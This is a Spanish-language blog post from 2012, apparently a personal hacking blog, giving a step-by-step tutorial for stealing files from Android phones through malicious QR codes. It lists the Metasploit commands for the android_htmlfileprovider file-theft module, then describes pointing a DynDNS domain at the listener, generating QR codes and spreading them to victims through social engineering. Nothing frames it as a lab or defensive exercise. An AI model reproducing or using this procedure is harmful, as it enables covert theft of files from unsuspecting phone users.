martes, 27 de noviembre de 2012

Ataque a Móviles Android Utilizando Codigos "Evil" QR

Cada vez es mas fácil toparte con estos códigos allá donde vayas y aunque su funcionamiento parece fácil podemos saber poco o casi nada del sitio donde nos mandan una vez escaneado el código con nuestro móvil   Hoy he hecho el experimento y la verdad es que el resultado a sido bastante placentero.

Si alguien tiene curiosidad de donde lleva la URL de este código
es el de la portada de la Wikipedia en Español  

 El proceso no tenia que ser difícil, solo tendríamos que decirle a metasploit que se ponga a escuchar por una IP y un puerto concreto en la maquina del atacante y crear un QR en forma de etiqueta. 

Para todo esto utilizaremos un modulo de metasploit llamado auxiliary, el cual nos proporciona de herramientas externas para el programa como por ejemplo: escaneres, herramientas de denegación de servicios, sniffers, etc. Mas concretamente usaremos el siguiente exploit:  [use gather/android_htmlfileprovider El cual tiene un rango medio y nos permita el "robo" de archivos de forma remota. 

Ingredientes: 
    • Distribución Linux:  Backtrack 5 - R3 ( R1 y R2 también sirven pero ya que estáis bajaros la ultima versión desde la pagina oficial que es gratis. ) http://www.backtrack-linux.org/
    • Tener instalado el Metasploit Frameworks (Si os habeis bajado la ultima versión viene de serie con el S.O)
    • Terminal Android.

Código:
    • msfconsole <-- con este comando abrimos a Metasploit 
    • use gather/android_htmlfileprovider <-- selecionamos el exploit que os he explicado antes
    • set FILES system/etc/host <-- en este comando le decimos que archivo queremos extraer de la victima, yo he elegido host porque es la ruta mas clara que tengo. 
    • set URIPATH / <-- hay un espacio enre Uripath y la [/] este comando sirve para crear un Identidicador de Recursos Uniforme de forma aleatoria. URI es una cadena caracteres la cual se utiliza para identificar un nombre o un recurso. 
    • set SRVPORT 8080 <-- Seleccionamos el puerto por el cual nos pondremos a la escucha. 
    • run <-- ejecutamos el exploit 


Ahora nos abrimos una cuenta en DynDNS (es un sistema que nos ofrece la posibilidad de poder tener nuestro servidor con una dirección como stateX.dyndns.com), aunque antes era gratuito ahora es de pago pero te dejan probarlo durante 14 días.  

La configuración es muy simple, solo se trata de rellenar el cuestionario y de poner todos los datos. Ojo pide datos de tarjeta de crédito pero como yo tenia alguna en la que solo había 1€ pues la he metido y pienso borrar el pedido antes de esos 14 días para que no me cobren ninguna tasa rara. 

Y nada, con nuestro dominio y con nuestros puertos debidamente abiertos. Vamos a cualquier pagina de generación de Codigos QR (yo he hecho la prueba con http://qrcode.kaywa.com/) y a distribuir códigos por los sitios en los que tu ingeniería social  pueda encontrar. 


No hay comentarios:

Publicar un comentario